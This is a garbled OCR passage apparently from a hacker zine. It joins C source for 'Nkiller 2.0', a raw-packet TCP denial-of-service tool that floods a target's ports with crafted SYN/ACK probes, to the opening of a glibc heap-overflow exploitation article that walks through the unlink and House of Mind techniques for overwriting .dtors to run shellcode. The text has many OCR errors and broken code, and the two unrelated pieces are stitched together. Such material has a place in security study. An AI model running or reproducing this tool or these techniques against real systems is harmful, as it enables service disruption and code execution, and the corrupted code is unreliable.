p t= 4; 
if (tsecr) { 
memcpy ((char *)tsecr, p, 4); 
*tsecr = ntohl(*tsecr); 
} 
return 1; 
} 
len -= oplen; 
p t= oplen - 2; 
} 
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*tsval = 0; 
*tsecr = 0; 
return 0; 
} 
/* 
* Craft SYN initiating probe 
A; 


static void 
send_syn_probe(HostInfo *Target, SniffInfo *Sniffer) 
{ 

char *packet; 

char *tcpopt; 

uintl6_t sport, dport; 

uint32_t encoded_seq; 

unsigned int packetlen, tcpopt_len; 

Sock *sockinfo; 


tcpopt_len = 0; 


sockinfo = xmalloc(sizeof(*sockinfo)); 
sport = (1024 + random()) % 65536; 


dport = port_get_random (Target) ; 


/* Calculate reverse cookie and encode value into sequence number */ 


sockinfo->saddr.s_addr = Sniffer-—>saddr.s_addr; 
sockinfo->daddr.s_addr = Target-—>daddr.s_addr; 
sockinfo->sport = sport; 


sockinfo->dport = dport; 
ncoded_seq = calc_cookie(sockinfo) ; 


/* Build tcp options - timestamp, mss */ 
tcpopt = build_timestamp(é&tcpopt, &tcpopt_len, 0, 0); 
tcpopt = build_mss(&tcpopt, &tcpopt_len, 1024); 


packet = build_tcpip_packet ( 
&Sniffer->saddr, 
&Target—>daddr, 
sport, 
dport, 
encoded_seq, 
0, 
64, 
random() % (uint16_t)7~0, 
1024, 
TH_SYN, 
NULL, 
0, 
tcpopt, 
tcpopt_len, 
&packetlen 
); 


send_packet (packet, &packetlen); 


free (tcpopt); 
free (sockinfo); 


Generic probe function: depending on the value of ’state’ as 
denoted by check_replies() earlier, we trigger a different probe 
behaviour, taking also into account any network stack templates. 


+ + + 


*/ 
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static int 
send_probe(const u_char *reply, HostInfo *Target, int state) 
{ 

char *packet; 
unsigned int packetlen,; 
uint32_t ack; 
char *tcpopt; 
unsigned int tcpopt_len; 
int validstamp; 
uint32_t tsval, tsecr; 
Struct \ip: *ip; 
struct tcphdr *tcp; 
uintl6_t datalen; 
uintl6_t window; 
int payload = 0; 


validstamp = 0; 
tcpopt_len = 0; 


ip = (struct ip *)reply; 
tcp = (struct tcphdr *) ((char *)ip + ip->ip_hl * 4); 
datalen = ntohs(ip->ip_len) (ip->ip_hl * 4) - (tcp->th_off * 4); 


switch (state) { 
case S_SYNACK: 
ack = ntohl(tcp->th_seq) + 1; 
window = 1024; 
payloadtt+; 
break; 
case S_DATA_0: 
ack = ntohl(tcp->th_seq) + datalen; 


if (o.template == T_BSDWIN) 
window = 0; 

else 
window = 512; 

break; 


case S_DATA_1: 
ack = ntohl(tcp->th_seq) + datalen; 
window = 0; 
break; 
case S_PROBE: 
ack = ntohl (tcp->th_seq) ; 


window = 0; 
break; 
default: /* we shouldn’t get here */ 
ack = ntohl (tcp->th_seq) ; 
window = 0; 
break; 


} 


if (get_timestamp(tcp, &tsval, &tsecr)) { 

validstamptt; 

tcpopt = build_timestamp(é&tcpopt, &tcpopt_len, 0, tsval); 
} 


packet = build_tcpip_packet ( 
&ip->ip_dst, /* mind the swapping */ 
&ip->ip_src, 
ntohs (tcp->th_dport), 
ntohs (tcp->th_sport), 
tcep->th_ack, /* as seq field */ 
htonl (ack), 


64, 

random() % (uint16_t)~0, 

window, 

TH_ACK, 

(payload) ? ((ntohs(tcp->th_sport) == 80) 


? Target->url : Target->payload) : NULL, 


9.txt Wed Apr 26 09:43:46 2017 41 


(payload) ? ((ntohs(tcp->th_sport) == 80) 
? Target->wlen : Target->plen) : 0, 

(validstamp) ? tcpopt : NULL, 

(validstamp) ? tcpopt_len : 0, 

&packetlen 

i 


send_packet (packet, &packetlen); 
free (tcpopt); 


return 0; 


* Reverse(or client) syn_cookie function - encode the 4tuple 

* { src ip, src port, dst ip, dst port } and a secret key into 

* the sequence number, thus keeping info of the packet inside itself 
* (idea taken by scanrand - Nmap uses an equivalent technique too) 


*/ 


static uint32_t 
calc_cookie (Sock *sockinfo) 


{ 


uint32_t seq; 

unsigned int cookie_len; 
unsigned int input_len; 
unsigned char *input; 
unsigned char cookie[EVP_MAX_MD_SIZE]; 


input_len = sizeof (*sockinfo) ; 
input = xmalloc(input_len); 
memcpy (input, sockinfo, sizeof (*sockinfo)); 


/* Calculate a shal hash based on the quadruple and the skey */ 
HMAC (EVP_shal(), (char *)o.skey, strlen(o.skey), input, input_len, 
cookie, &cookie_len)j; 


free (input); 


/* Get only the first 32 bits of the shal hash */ 
memcpy (&seq, &cookie, sizeof (seq)); 
return seq; 


static void 
sniffer_init (HostInfo *Target, SniffInfo *Sniffer) 


{ 


char errbuf [PCAP_ERRBUF_SIZE]; 
struct bpf_program bpf; 

struct pcap_addr *address; 
struct sockaddr_in *ip; 

char filter[27]; 


strncpy(filter, "src host ", sizeof(filter)); 
strncpy (éfilter[sizeof("src host ")-1], inet_ntoa(Target->daddr), 16); 
if (o.debug) 

(void) fprintf(stdout, "Filter: %s\n", filter); 


if ((pcap_findalldevs (&éSniffer-—>dev, errbuf)) == -1) 
fatal("%s: pcap_findalldevs(): %s\n", __func__, errbuf); 
address = Sniffer-—>dev->addresses; 


address = address-—>next; /* first address is garbage */ 
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if (address->addr) { 
ip = (struct sockaddr_in *) address->addr; 
memcpy (&Sniffer->saddr, &ip->sin_addr, sizeof(struct in_addr)); 
if (o.debug) { 
(void) fprintf(stdout, "Local IP: %s\nDevice name: " 
"Ss\n", inet_ntoa(Sniffer->saddr), Sniffer->dev->name) ; 


} 
} else 
fatal("%s: Couldn’t find associated IP with interface %s\n", 
__func__, Sniffer->dev->name) ; 


if (!(Sniffer->pd = 
pcap_open_live (Sniffer->dev->name, BUFSIZ, 0, 0, errbuf))) 
fatal("%Ss: Could not open device %s: error: s\n ", __func__, 


Sniffer->dev->name, errbuf); 


if (pcap_compile(Sniffer->pd , &bpf, filter, 0, 0) == -1) 
fatal("%Ss: Couldn’t parse filter %s: %s\n ", __func__, filter, 


pcap_geterr (Sniffer-—>pd) ); 


if (pcap_setfilter(Sniffer->pd, &bpf) == -1) 
fatal("%s: Couldn’t install filter %s: %s\n", __func__, filter, 
pcap_geterr (Sniffer->pd) ); 


if (pcap_setnonblock (Sniffer->pd, 1, NULL) < 0) 
fprintf(stderr, "Couldn’t set nonblocking mode\n") ; 


static uintl6_t * 
port_parse(char *portarg, unsigned int *portlen) 


{ 


char *endp; 

uintl6_t *ports; 
unsigned int nports; 
unsigned long pvalue; 
char *temp; 

*portlen = 0; 


ports = xmalloc(65535 * sizeof (uintl6_t)); 
nports = 0; 


while (nports < 65535) { 
if (nports == 0) 
temp = strtok(portarg, ","); 
else 
temp = strtok(NULL, ","); 


if (temp == NULL) 
break; 


endp = NULL; 


errno = 0; 
pvalue = strtoul(temp, éendp, 0); 
if (errno != 0 || *endp != ’\0’) { 
fprintf(stderr, "Invalid port number: %s\n", 
temp) ; 


goto cleanup; 


} 


if (pvalue > IPPORT_MAX) { 
fprintf(stderr, "Port number too large: %s\n", 
temp) ; 
goto cleanup; 


} 


ports[nportst++] = (uint16_t) pvalue; 
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} 

if (portlen != NULL) 
*portlen = nports; 

return ports; 


cleanup: 
free (ports); 
return NULL; 


/* 
* Check if port is in list, return 0 if it is, -1 if not 
* (similar to port_remove in logic) 
27 
static int 
port_exists(HostInfo *Target, uintl6_t port) 
{ 
port_elem *current; 
port_elem *before; 


current = Target->ports.first; 
before = Target-—>ports.first; 


while (current->port_val != port && current->next != NULL) { 
before = current; 
current = current-—>next; 


} 


if (current->port_val != port && current->next == NULL) { 
if (o.debug2) 
(void) fprintf(stderr, "Ss: port Su doesn’t exist in " 
"list\n", _ func__, port); 
return -1; 
} else 
return 0; 


/* 
* Remove specific port from portlist 
xy 
static void 
port_remove (HostInfo *Target, uintl6_t port) 
{ 
port_elem *current; 
port_elem *before; 


current = Target-—>ports.first; 

before = Target-—>ports.first; 

while (current->port_val != port && current->next != NULL) { 
before = current; 
current = current-—>next; 

} 

if (current->port_val != port && current->next == NULL) { 
if (current != Target->ports.first) { 


if (o.debug2) 
(void) fprintf(stderr, "Port Su not found in list\n", port); 
return; 


} 


if (current != Target->ports.first) { 
before->next = current—>next; 
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} else { 
Target-—>ports.first = current-—>next; 


} 
Target-—>portlen--; 
if (!Target-—>portlen) 
fatal("No port left to hit!\n"); 


/* 
* Add new port to port linked list of Target 
my 

static void 

port_add(HostiInfo *Target, uint1l6_t port) 

{ 

port_elem *current; 
port_elem *newNode; 


newNode = xmalloc(sizeof (*newNode) ); 


newNode->port_val = port; 
newNode->next = NULL; 


if (Target->ports.first == NULL) { 
Target-—>ports.first = newNode; 
Target-—>ports.last = newNode; 
return; 


} 


current = Target-—>ports.last; 
current-—>next = newNode; 
Target-—>ports.last = newNode; 


/* 
* Return a random port from portlist 
af 

static uintlé6é_t 

port_get_random(HostInfo *Target) 

{ 

port_elem *temp; 
unsigned int i, offset; 


temp = Target-—>ports.first; 
offset = (random() *« Target->portlen) ; 
1 =1.0:3 
while (i < offset) { 
temp = temp->next; 
t+; 
} 


return temp->port_val; 


* Prepare the payload that will be sent in the 3rd phase 
* of the Connection-estalishment handshake (piggypacked 
* along with the ACK of the peer’s SYNACK) 

*/ 
static void 
handle_payloads(HostInfo *Target) 


{ 


if (o.payload[0]) { 
Target->plen = strlen(o.payload); 
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strncpy (Target-—>payload, 

} else { 
Target->payload = NULL; 

Target->plen = 0; 


} 


if (o.path[0]) { 
if (o.vhost[0]) { 
n 
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Target-—>payload = xmalloc(Target->plen) ; 
o.payload, 


Target—>plen) ; 


Target->wl = strlen(o.path) + strlen(o.vhost) + 
sizeof("GET HTTP/1.0\015\012Host: \015\012\015\012") 
Target-—>url = xmalloc(Target->wlen + 1); 
/* + 1 for trailing ‘'\0’ of snprintf () * / 
snprintf (Target->url, Target->wlen + 1, 
"GET %s HTTP/1.0\015\012Host: %s\015\012\015\012", 
o.path, o.vhost); 
} else { 
Target-—>wlen = strlen(o.path) + 
sizeof("GET HTTP/1.0\015\012\015\012") - 1; 
Target->url = xmalloc(Target->wlen + 1); 
snprintf (Target->url, Target->wlen + 1, 
"GET Ss HTTP/1.0\015\012\015\012", o.path); 
} 
} else { 
Target—>wlen = sizeof(WEB_PAYLOAD) - 1; 
Target-—>url = xmalloc(Target-—>wlen) ; 


memcpy (Target-—>url, WEB_PAYLOAD, 


/* No way you have seen this before! 


static uintlé_t 
checksum_comp (uint1l6_t *addr, 
{ 
register long sum = 0; 
uintl6_t checksum; 
int count = len; 
uintl6_t temp; 


while (count > 1) { 
temp = *addrt++; 
sum += temp; 
count -= 2; 


} 


if (count > 0) 


Target—>wlen) ; 


ay 


int len) 


sum += *(char *) addr; 
while (sum >> 16) 

sum = (sum & Oxffff) + (sum >> 16); 
checksum = “sum; 


return checksum; 


main(int argc, char **argv) 
nt print_help; 

nt opt; 

nt required; 


nsigned int portlen; 
nsigned int probes, 


probes_sent, 


probes_left; 
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unsigned int probes_this_rnd, probes_rnd_fini; 
int unlimited, state, probe_byusr; 

HostInfo *Target; 

SniffInfo *Sniffer; 

u_char *reply; 

char *endp; 


srandom(time(0)); 


if (argc == 1) { 
usage (); 


} 


memset (&0, 0, sizeof(o)); 
unlimited = 0; 

required = 0; 

portlen = 0; 

print_help = 0; 
probe_byusr = 0; 


probes = DEFAULT_NUM_PROBES; 
o.sleep = DEFAULT_SLEEP_TIME 
o.probes_per_rnd = DEFAULT_PROBES_RND; 
o.probe_interval D PROBE_INTERVAL; 
strncpy(o.skey, DEFAULT_KEY, sizeof (o.skey)); 
o.polltime = DEFAULT_POLLTIME; 


/* Option parsing */ 
while ((opt = getopt(argce, argv, "t:k:liw:c:p:in:ivd:s:r:N:T:P:yhg") ) 
!= -1) 


switch (opt) 
{ 


case ‘tt’: /* target address */ 
strncpy(o.target, optarg, sizeof(o.target)); 
requiredt+; 
break; 

case 'k’: /* secret key */ 
strncpy(o.skey, optarg, sizeof(o.skey)); 
break; 

case 'l’: /* payload */ 
strncpy(o.payload, optarg, sizeof(o.payload) - 1); 
break; 

case 'w'’: /* path */ 
strncpy(o.path, optarg, sizeof(o.path) - 1); 
break; 

case 'r’: /* vhost name */ 
strncpy(o.vhost, optarg, sizeof(o.vhost) -1); 
break; 

case 'c!’: /* polltime */ 


endp = NULL; 


o.polltime = strtoul(optarg, &endp, 0); 
if (errno != 0 || *endp != ’\0’) 
fatal ("Invalid polltime: %s\n", optarg); 
break; 
case 'p’: /* destination port */ 


if (!(o.portlist = port_parse(optarg, &portlen))) 
fatal("Couldn’t parse ports!\n"); 


requiredtt; 
break; 
case ‘n’: /* number of probes */ 


endp = NULL; 

o.probes = strtoul(optarg, &endp, 0); 

if (errno != 0 || *endp != ’\0’) 
fatal("Invalid probe number: %s\n", optarg); 

probe_byusrtt+; 

if ('!o.probes) { 
unlimited+tt+; 
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probe_byusr = 0; 
} 
break; 
case 'N’: /* probes per round */ 
endp = NULL; 
o.probes_per_rnd = strtoul(optarg, &endp, 0); 
if (errno != 0 || *endp != ’\0") 
fatal("Invalid probes-per-round number: %s\n", optarg); 
break; 
case 'T’: /* template number */ 
endp = NULL; 
o.template = strtoul(optarg, &endp, 0); 
if (errno != 0 || *endp != ’\0’) 
fatal("Invalid template number: %s\n", optarg); 
break; 
case 'P’: /* probe timer interval */ 
endp = NULL; 
o.probe_interval = strtoul(optarg, &endp, 0); 
if (errno != 0 || *endp != ’\0") 
fatal ("Invalid probe-interval number: %s\n", optarg); 
break; 
case 'g’: /* guard mode */ 
o.guardmodet++; 
break; 
case 'v’: /* verbose mode */ 
o.verbosett; 
break; 
case 'd’: /* debug mode */ 
endp = NULL; 
debug_level = strtoul(optarg, &endp, 0); 
if (errno != 0 || *endp != ’\0") 
fatal("Invalid probe number: %s\n", optarg); 
if (debug_level != 1 && debug_level != 2) 
fatal ("Debug level must be either 1 or 2\n"); 
else if (debug_level == 1) 
o.debugt+; 
else { 
o.debug2++; 
o.debugt+; 
} 
break; 
case ’s’ /* sleep time between each probe */ 
endp = NULL; 
o.sleep = strtoul(optarg, &endp, 0); 
if (errno != 0 || *endp != ’\0’) 
fatal("Invalid sleep number: %s\n", optarg); 
break; 
case 'y’: /* dynamic port handling */ 
o.dynamictt; 
break; 
case /‘h’: /* help - usage */ 
print_help = 1; 
break; 
case '?': /* error */ 
usage (); 
break; 
} 
} 
if (print_help) { 
help(); 
exit (EXIT_SUCCESS) ; 


if (getuid() && geteuid()) 


fatal ("You need to be root.\n"); 


if (required < 2) 
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fatal("You have to define both -t <target> and -p <portlist>\n"); 


(void) fprintf(stdout, "\nStarting Nkiller 2.0 " 
"( http://sock-raw.org )\n"); 


Target = xmalloc(sizeof(HostInfo) ); 
Sniffer = xmalloc(sizeof(SniffInfo)); 


Target-—>portlen = portlen; 
for (i = 0; i < Target->portlen; i++) 
port_add(Target, o.portlist[i]); 


if ('unlimited && probe_byusr) 
probes = o.probes; 


inet_pton(AF_INET, o.target, &Target-—>daddr) ; 


handle_payloads (Target) ; 
sniffer_init (Target, Sniffer); 


if (o.verbose) { 
if (unlimited) 
(void) fprintf(stdout, "Probes: unlimited\n") ; 
else 
(void) fprintf(stdout, "Probes: %u\n", probes); 
(void) fprintf(stdout, 
"Probes per round: %u\n" 
"Pcap polling time: %u microseconds\n" 
"Sleep time: %u microseconds\n" 
"Key: %s\n" 
"Probe interval: %u seconds\n" 
"Template: %s\n", o.probes_per_rnd, o.polltime, 
o.sleep, o.skey, o.probe_interval, get_template(o.template)); 
if (o.guardmode) 
(void) fprintf(stdout, "Guardmode on\n"); 


} 


probes_sent = 0; 

probes_left = probes; 

probes_rnd_fini = 0; 

probes_this_rnd = 0; 

/* Main loop */ 

while (probes_left || o.guardmode || unlimited) { 


if (probes_rnd_fini >= o.probes_per_rnd) { 
probes_rnd_fini = 0; 
probes_this_rnd = 0; 

} 


if (!unlimited && probes_left == (0.5 * probes) && o.verbose) 
(void) fprintf(stdout, "Half of probes left.\n"); 


if (probes_sent < probes && probes_this_rnd < o.probes_per_rnd) { 
send_syn_probe (Target, Sniffer); 
if (!unlimited) 
probes_sentt+; 
probes_this_rndt+; 


} 


usleep(o.sleep); /* Wait a bit before each probe */ 


state = check_replies(Target, Sniffer, é&reply); 


switch (state) 
{ 

case S_ERR: 

continue; 
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break; 

case S_SYNACK: 
send_probe (reply, 
free(reply); 
break; 

case S_FDACK: 
continue; 
break; 

case S_PROBE: 
send_probe (reply, 
free(reply); 
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Target, S_SYNACK) ; 


Target, S_PROB 


Gl 
~~ 
~ 


probes_rnd_finitt; 


if (!unlimited) 
probes_left--; 
break; 
case S_DATA_0: 
send_probe (reply, 
free(reply); 
if (o.template == 


probes_rnd_finitt; 


break; 

case S_DATA_1: 
send_probe (reply, 
free(reply); 


Target, S_DATA_0); 


T_BSDWIN) 


Target, S_DATA_1); 


/* Increase aggressiveness */ 
probes_rnd_finitt; 


break; 
default: 
break; 


} 


(void) fprintf(stdout, ' 
exit (EXIT_SUCCESS) ; 


[ 6 References 


"Finished. \n"); 
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http://seclists.org/bugtrag/2000/Apr/0152.html 


2]. TCP DoS Vulnerabilities by Fabian ’fabs’ Yamaguchi - 
http://www. recurity-labs.com/content/pub/25C3TCPVulnerabilities.pdf 


3]. TCP/IP Illustrated vol. 1 - W. Richard Stevens 


— Robert Love 


4]. Linux Kernel Development (Chapter 10 - Timers and Time Management) 
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On August 11, 2001, two papers were released in that same magazine and 
they went to demonstrate a new advance in the vulnerabilities exploitation 
world. MaXX wrote in his "Vudo malloc tricks" paper [1], the basic 
implementation and algorithms of GNU C Library, Doug Lea’s malloc(), and 
he presented to the public various methods that be able to trigger 
arbitrary code execution through heap overflows. At the same time, h 
showed a real-lif xploit of the "Sudo" application. 


In the same number of Phrack, an anonymous person released other article, 
titled "Once upon a free()" [2]. Its main goal was explain the System V 
malloc implementation. 


On August 13, 2003, "jp <jp@corest.com>" developed of a way more advanced 
the skills initiated in the previous texts. His article, called "Advanced 
Doug Lea’s malloc exploits" [3], maybe out the biggest support to what it 
was for coming... 


The skills published in the first one of the articles, showed: 


—- unlink () method. 
-— frontlink () method. 


these methods were applicable until the year 2004, when the GLIBC 
library was patched so those methods did not work. 


But not everything was said with regard to this topic. On October 11 of 
2005, Phantasmal Phantasmagoria was publishing on the "bugtraq" mailing 
list an article which name provokes a deep mystery: "Malloc Maleficarum" 
alee 


[The name of the article was a variation of an ancient text 
called "Malleus Maleficarum" (The Hammer of the Witches)... 


Phantasmal also was the author of the fantastic article "Exploiting the 
Wilderness" [5], the chunk most afraid (at first) by the heap’s lovers. 


Malloc Maleficarum was a completely theoretical presentation of what could 
become the new skills of exploitation with regard to topic of the heap 
overflows. His author split each one of the skills titling them of the 
following way: 


The House of Prime 

The House of Mind 

The House of Force 

The House of Lore 

The House of Spirit 

The House of Chaos (conclusion) 


And certainly, it was the revolution that open again the minds when the 
doors had been closed. 


The only one fault of this article is that it was not showing any 
proof of concept that demonstrated that each and every one of the 
skills were possible. 


Probably, the implementations stayed in the "background", or maybe in 
closed circles. 


On January 1, 2007, in the electronic magazine ".aware EZine Alpha", 
K-sPecial published an article simply called "The House of Mind" [6]. 
This one come to declaring in first instance the lacking small 

fault of Phantasmal’s article. 


On the other hand, he solved it presenting a proof of concept continued 
with its correspondent exploit. 


Also, K-sPecial’s paper was bringing to the light a couple of shades in 
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which Phantasmal had missed in his interpretation of the Houses skills. 


Finally, on May 25, 2007, g463 published in Phrack an article called: 

"The use of set_head to defeat the wilderness." [7] g463 described how to 
obtain a "write almost 4 arbitrary bytes to almost anywhere" primitive 

by exploiting an existing bug in the file (1) utility. This is the most 
recent advance in heap overflows. 


<< En todas las actividades es saludable, de vez 
en cuando, poner un signo de interrogacion 
sobre aquellas cosas que por mucho tiempo se 
han dado como seguras. >> 


[ Bertrand Russell ] 


Sse 2 Soo INTRODUCTION ea 


We could to define this paper as "The Practical Guide of the Malloc 
Maleficarum". And exactly, our main goal is demythologize the majority 
of the methods described in this paper through practical examples (so 
much the vulnerable programs as its associated exploits). 


On the other hand, and very importantly, certain mistakes were trying to 
be corrected that were an object of wrong interpretation in Malloc 
Maleficarum. Mistakes that are today more easy to see thanks to the 
enormous work that Phantasmal give us in his moment. He is an adept, a 
"virtual adept" certainly... 


It is due to these mistakes that in this article I present new 
contributions to the world of the heap overflow under Linux, introducing 
variations in the skills presented by Phantasmal, and totally new ideas 
that could allow arbitrary code execution by a better way. 


In short, you will see in this article: 


—- Clean modification of K-sPecial’s exploit in The House of Mind. 

—- Implementation renewed of the "fastbin" method in The House of Mind. 

— Practical implementation of The House of Prime method. 

- New idea for direct arbitrary code execution in unsorted_chunks () 
method in The House of Prime. 


— The House of Spirit practical implementation. 
-— The House of Force practical implementation. 
— Recapitulation of mistakes in The House of Force theory committed in 


Malloc Maleficarum. 


— Theoretical/practical approximation to The House of Lore. 


In addition to a general understanding of the implementation of the "Doug 
Lea’s malloc" library, I recommend two things: 


1) Read first the article of Maxx [1]. 
2) Download and read the source code of glibc-2.3.6 [8] 
(malloc.c and arena.c). 


NOTE: Except for The House of Prime, I had used a x86 Linux distro, 
on a 2.6.24-23 kernel, with glibc version 2.7, which shows 
that these techniques are still applicable today. Also, I have 
check that some of them are availables in 2.8.90. 


NOTE 2: The current implementation of malloc is known as "ptmalloc", 
which is an implementation based on the previous "dlmalloc". 
Ptmalloc was created by Wolfram Gloger. At present, from glibc 
2.7 to 2.10 are Ptmalloc2 based. You can obtain more information 
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if you visit [9]. 


As there, it would be desirable to have at your side the Phantasmal’s 
theory as support to subsequent methods that will be implemented. However, 
the concepts described in this paper should be sufficient for an almost 
complete understanding of the topic. 


In this article you will see, through the witches, as there are still 
some ways to go. And we can go together 


<< Lo que conduce y arrastra 
al mundo no son las maquinas, 
Sino las ideas. >> 


[ Victor Hugo ] 


Sea Bi ras WELCOME TO THE PAST /s= 


Why does the "unlink()" technique not apply now? 


"unlink ()" assumed that if two chunks were allocated in the heap, and 
second was vulnerable to being overwritten through an overflow of first, 
a third fake chunk could be created and so deceive "free ()" to proceed 
to unlink this second chunk and tie with the first. 


Unlink was produced with the following code: 


#define unlink( P, BK, FD ) { 
BK = P->bk; 
FD = P->fd; 
FD->bk = BK; 
BK->fd = FD; 


BE BLE a a 


} 


Being P the second chunk, "P->fd" was changed to point to a memory area 
capable of being overwritten (such as .dtors —- 12). If "P->bk" then 
pointed to the address of a Shellcode located at memory for an exploiter 
(at ENV or perhaps the same first chunk), then this address would be 
written in the 3rd step of unlink() code, in "FD->bk". Then: 


"FPD->bk" "P->fd" + 12 WTOtOrs+ s 
",dtors" -—> &(Shellcode) 


In fact, when using DTORS, "P->fd" should point to .dtors+4-12 so that 
"FD->bk" point to DTORS_END, to be executed at finish of application. GOT 
is also a good goal, or a function pointer or more things 


And here started the fun! 


By applying the appropriate patches glibc, the macro "unlink()" is shown 
as follows: 


#define unlink(P, BK, FD) { 
FD = P->fd; 
BK = P->bk; 


if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) 
malloc_printerr (check_action, "corrupted double-linked list", P); 
else { 
FD->bk = BK; 
BK->fd = FD; 


OE AE BE A ae (eee 
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If "P->fd", pointing to the next chunk (FD), is not modified, then the 
"bk" pointer of FD should point to P. The same is true with the previous 
chunk (BK)... if "P->bk" points to the previous chunk, then the forward 
pointer at BK should point to P. In any other case, mean an error in the 
double linked list and thus the second chunk (P) has been hacked. 


And her nded the fun! 


<< Nuestra tecnica no solo produce artefactos, 
esto es, cosas que la naturaleza no produce, 
sino tambien las cosas mismas que la naturaleza 
produce y dotadas de identica actividad 
natural. >> 


[ Xavier Zubiri ] 


—-=[. 4 =-=[ DES-MALEFICARUM... Je=> 


Read carefully what now comes. I just hope that at the end of this paper, 
the witches have completely disappeared. 


Or... would it be better that they stay? 


sesi[ 46d —s=[ THE HOUSE OF MIND ]--- 


We will study "The House of Mind" technique here, step by step, so that 
those who start at these boundaries do not find too many problems along 
the path... a path that already may be a little hard. 


Neither show is worth a second view / opinion about how develop the 
exploit, which in my case had a small behavioral variation (we will see it 
below). 


The understanding of this technique will become much easier if for some 
accident I can demonstrate the ability of know to show the steps in 
certain order, otherwise the mind go from one side to another, but... test 
and play with the technique. 


"The House of Mind" is described as perhaps the easiest method or, at 
least, more friendly with respect to what was "unlink()" in its moment of 
glory. 


Two variants will be shown. Let’s s here the first one: 


NOTE 1: Only one call to "free()" is needed to provoke arbitrary code 
execution. 


NOTE 2: From here, we will have always in mind that "free()" is executed 
on a second chunk that can be overflowed by another chunk that 
has been allocated before. 


According to "malloc.c," a call to "free()" triggers the execution of a 
wrapper (in the jargon "wrapper functions") called "public_fREe()". 


Here the relevant code: 


void 
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public_fREe (Void_t* mem) 
{ 


mstate ar_ptr; 


mchunkptr p; /* chunk corresponding to mem */ 
Pp = mem2chunk (mem) ; 
ar_ptr = arena_for_chunk (p); 


_int_free(ar_ptr, mem); 


A call to "malloc (x)" returns, always that there is still memory 
available, a pointer to the memory area where data can be stored, moved, 
copied, etc. 


Imagine for example that: 


"Char * ptr = (char *) malloc (512);" 
..returns the address "0x0804a008". This address is the "mem" content 
when "free()" is called. 


The "mem2chunk (mem)" function returns a pointer to the start address of 
chunk (not the data, but the beginning of the chunk), which in a allocated 
chunk is set to something like: 


émem — sizeof (size) sizeof (prev_size) = &mem 8. 
p = (0x0804a000) ; 


"Dp" is send to "arena_for_chunk()". As we can read in "arena.c", it 
trigger the following code: 


define HEAP_MAX_SIZE (1024*1024) /* must be a power of two */ 


| 

| | 
| #define arena_for_chunk (ptr) \ 

| (chunk_non_main_arena(ptr) ?heap_for_ptr (ptr) ->ar_ptr:é&main_arena) 


| 

define heap_for_ptr(ptr) \ 
((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE-1))) | 
| 
define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA) | 
| 


As we see, "p" is now "ptr". It is passed "chunk_non_main_arena()" 
which is responsible for checking whether the "size" of this chunk has 
its third least significant bit enabled (NON_MAIN_ARENA = 4h = 100b). 


In a unmodified chunk, this function returns "false" and the address of 
"main_arena" will be returned by "arena_for_chunk()". But... fortunately, 
since we can corrupt the "size" field of "p", and enabled NON_MAIN_ARENA 
bit, then we can fool "arena_for_chunk()" to call to "heap_for_ptr(). 


We are now in: 


(heap_info *) ((unsigned long) (0x0804a000) & ~(HEAP_MAX_SIZE-1))) 


then: 
(heap_info *) (0x08000000) 


We must have in mind that "heap_for_ptr()" is a macro and not a function. 
Then, once more in “arena_for_chunk()" we have: 
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(Ox08000000) ->ar_ptr 


"ar ptr" is the first member of a "heap_info" structure. It is defined 
as you can see: 


typedef struct _heap_info { 

mstate ar_ptr; /* Arena for this heap. */ 

struct _heap_info *prev; /* Previous heap. */ 

size_t size; /* Current size in bytes. */ 

size_t pad; /* Make sure the following data is properly aligned. */ 
} heap_info; 


So what you are looking at (0x08000000) the address of an "arena" (it will 
be defined shortly). For now, we can say that at (0x08000000) there isn’t 
any address to point to any "arena", so the application soon will break 
with a segmentation fault. (assuming an ET_EXEC with a base of 0x08048000) 


It seems that our move end here. As our first chunk is just behind of the 
second chunk at (0x0804a000) (but not much), this only allows us to 
overwrite forward, preventing us write anything at (0x08000000). 


But wait a moment... what happens if we can overwrite a chunk with an 
address like this: (0x081002a0)? 


If our first chunk was at (0x0804a000), we can overwrite ahead and put in 
(0x08100000) an arbitrary address (usually the begining of the data of our 
first chunk). 


Then "“heap_for_ptr(ptr)->ar_ptr" take this address, and... 


return heap_for_ptr(ptr)->ar_ptr ret (0x08100000)->ar_ptr = 0x0804a008 


| 
| 
ar_ptr = arena_for_chunk (p); | ar_ptr = 0x0804a008 
| 
| 


_int_free(ar_ptr, mem); _int_free(0x0804a008, 0x081002a0); 


Think that we can change "ar_ptr" to any value. For example, we can do 
that it points to an environment variable or another place. At this 
address of memory, "_int_free()" expects to find an "arena" structure. 
Let’s see now 

mstate ar_ptr; 


"mstate" is actually a real "malloc_state" structure (no comments): 


struct malloc_state { 
mutex_t mutex; 


INTERNAL SIZE_T max_fast; /* low 2 bits used as flags */ 
mfastbinptr fastbins [NFASTBINS]; 

mchunkptr top; 

mchunkptr last_remainder; 

mchunkptr bins[NBINS * 2]; 

unsigned int binmap [BINMAPSIZE]; 

INTERNAL SIZE_T system_mem; 

INTERNAL SIZE_T max_system_mem; 


}; 


static struct malloc_state main_arena; 


Soon it will be helpful to know this. The goal of The House of Mind is to 
ensure that the unsorted_chunks() code is reaached in "_int_free ()": 
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void _int_free(mstate av, Void_t* mem) { 
bck = unsorted_chunks (av); 
fwd = bck->fd; 
p->bk = bck; 
p->fd = fwd; 
bck->fd = p; 
fwd->bk = p; 


This is already beginning to look a bit more to "unlink()". 


Now "av" is the value of "ar_ptr" which is supposed to be the beginning 
of an "arena". More... "unsorted_chunks ()," according to Phantasmal 
Phantasmagoria, return the value of "av->bins[0]". If "av" is (0x0804a008) 


(the start of our buffer), and we can write forward, we can control the 
value of bins[0], once past fields: mutex, max_fast, fastbins[] and top. 
This is simple 


Phantasmal showed us that if we put in av->bins[0] the address of ".dtors" 
minus 8, then, the penultimate sentence write in this address plus 8, the 
a 
t 


ddress of the overflow "p". In this address is the "prev_size" field and 
here can place any thing, such as a "JMP", then we can jump to shellcode 
located a little later and you know as follows 


p = 0x081002a0 —- 8; 
bck = .dtors + 4 - 8 


bck + 8 = DTORS_END = 0x08100298 


Ist Bit -bins[0]- 2nd Bit 

[eS oo haere fs -dtors+t4-8 ] [0x0804a008 ... J] [jmp Oxc ...... (Shellcode) ] 
| | | 

0x0804a008 0x08100000 0x08100298 


When application finishes running DTORS, therefore the jump is executed, 
and our Shellcode. 


Although the idea was good, K-special warned us that "unsorted_chunks ()", 
in fact, did not return the value of "av->bins[0]," but it returns its 


address "&". 


Let’s take a look: 


#define bin_at(m, i) ((mbinptr) ((char*) &((m)->bins[ (i)<<1]) - 
